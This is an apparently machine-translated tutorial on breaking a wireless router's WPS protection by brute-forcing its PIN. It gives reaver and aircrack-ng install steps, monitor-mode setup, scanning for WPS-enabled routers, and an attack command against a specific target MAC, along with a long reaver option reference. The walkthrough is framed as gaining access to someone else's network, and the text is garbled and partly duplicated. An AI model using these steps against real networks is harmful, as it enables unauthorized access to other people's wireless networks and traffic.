Required tools: reaver principle: Brute Force PIN code to break the wireless router's security protection installation: Download source code download reaver source code from this URL http://code.google.com/p/reaver-wpswgethttp://reaver-wps.googlecode.com/files/reaver-1.4.tar.gz Unzip the tar-xzvf reaver-1.4.tar.gz to install necessary software dependent libraries and tools. Install tools such as pcaplib before you compile reaver, later you also need aircrack-ngsudo apt-get install libpcap-dev sqlite3 libsqlite3-dev libpcap0.8-dev to compile and install the configuration and compile Reaver cd reaver-1.4cd src. /configuremake downloads the aircrack-ng source code and compiles the aircrack-ng from Ubuntu12.04 and is no longer included in the version software repository. However, we can download its source code from the Internet for compilation and installation. If aircrack-ng already exists, you do not need to install it .. /Configuremakesudo install unzip tar-xzvf reaver-1.4.tar.gz install necessary software dependency libraries and tools before you compile reaver need to install tools such as pcaplib, later you also need aircrack-ng sudo apt-get install libpcap-dev sqlite3 libsqlite3-dev libpcap0.8-dev to compile and install the configuration and compile Reaver cd reaver-1.4 cd src. /configure make install Reaver sudo make install method: 1 input: airmon-ng start wlan0 enable listening mode (the screen shows that the 8187L driver is loaded successfully-loading is successful once !) 2 input: wash-I mon0-C view all wireless routes with WPS enabled do not respond for a long time press Ctrl + C to end the process, then write down the target route MAC.3 you want PJ input: the airodump-ng mon0 Nic scans all channels in hybrid mode and displays information about all APs (including AP signal strength, ESSID, MAC, channels, encryption methods, etc .....), Press Ctrl + C to end the scan. Note: If you know the recipient's wireless route information 2nd, skip step 1! 4 input: reaver-I mon0-B MAC-a-S-vv start to raise the pin code. Note: you can press CTRL + C to exit the Save process at any time, press the cursor control key "up" next time and press enter to continue the process. In practice, I entered reaver-I mon0-B MACD8: 5D: 4C: 37: 78: F6-a-S-vv-d 0 (Added-d 0 to speed up ), see the screen flash ...... Awesome! Reaver parameter description must be parameter-I,-interface = <wlan> Name of the monitor-mode interface to use Nic monitoring interface, usually mon0-b, -bssid = <mac> BSSID of the target apap mac address Optional Arguments: Optional parameter-m,-mac = <mac> MAC of the host system specifies the local MAC address-e, -essid = <ssid> ESSID of the target AP router. Generally, you do not need to specify-c,-channel = <channel> Set the 802.11 channel for the interface (implies-f) signal channel. If this parameter is not specified, the system automatically scans-o,-out-file = <file> Send output to a log f. Ile [stdout] outputs the log file-s,-session = <file> Restore a previous session file recovery Progress file-C, -exec = <command> Execute the supplied command upon successful pin recoverypin after the command is successfully executed-D,-daemonize Daemonize reaver to set reaver to Daemon-, -auto Auto detect the best advanced options for the target AP automatic detection of the target AP advanced parameter-f,-fixed Disable channel hopping prohibit channel jump-5, -5 ghz Use 5 GHz 802.11 channels Use 5g channel-v,-verbose Display non-critical Warnings (-vv for more) show unimportant warning information-vv can show more-q,-quiet Only display critical messages Only show key information-h, -help Show help: displays help Advanced Options: Advanced Options-p, -pin = <wps pin> Use the specified 4 or 8 digit WPS pin to Use the specified 4-or 8-bit pin code-d, -delay = <seconds> Set the delay between pin attempts [1] latency between pin. the default value is 1 second-l, -lock-delay = <seconds> Set the time to wait if the AP locks WPS pin attempts [60] wait for the time-g after the AP locks WPS, -max-attempts = <num> Qui T after num pin attempts Max pin times Reaver parameter-daily-x, -fail-wait = <seconds> Set the time to sleep after 10 unexpected failures [0] wait time after 10 unexpected failures. the default value is 0 s-r, -recurring-delay = <x: y> Sleep for y seconds every x pin attempts waits for y seconds-t every x times after pin, -timeout = <seconds> Set the receive timeout period [5] packet receiving timeout. the default value is 5 seconds-T, -m57-timeout = <seconds> Set the M5/M7 timeout period [0.20] M5/M7 timeout, default 0.2 S-A,-no-associate Do not associate with t He AP (association must be done by another application) not connected to AP (other programs must be completed during the connection)-N, -no-nacks Do not send NACK messages when out of order packets are supported ed (if the pin remains unchanged, try this parameter)-S, -dh-small Use small DH keys to improve crack speed Use small DH key values to increase the speed (recommended)-L, -ignore-locks Ignore locked state reported by the target AP ignores the lock status reported by the target AP-E,-eap-terminate Terminate each WPS session with an eap fail packet Every time you receive an EAP failure packet, the WPS process-n is terminated.-nack Target AP always sends a NACK [Auto] always sends NACK to the Target AP. The default value is-w, -win7 Mimic a Windows 7 registrar [False] simulates win7 registration and disables Ps by default: there are many factors that affect wireless connection, so the cooperation between parameters is very important. Of course, the most important thing is the signal. Principle details: What is a PIN code? A group of 8-digit strings printed on the wireless router device label. The wireless router management interface also exists and can be changed. What is the use of PIN code? Enter the 8-digit numeric string on the wireless router device in the companion management software (such as the QSS software of the TP-LINK) of the wireless Nic to successfully log on to the encrypted wireless router. What does the PIN code mean? Now that we know the range of the wireless router PIN value (8-bit pure number), and currently the WPS of most devices is enabled, therefore, the brute force behavior of exploiting the PIN code to break the security protection of the wireless router is theoretically feasible.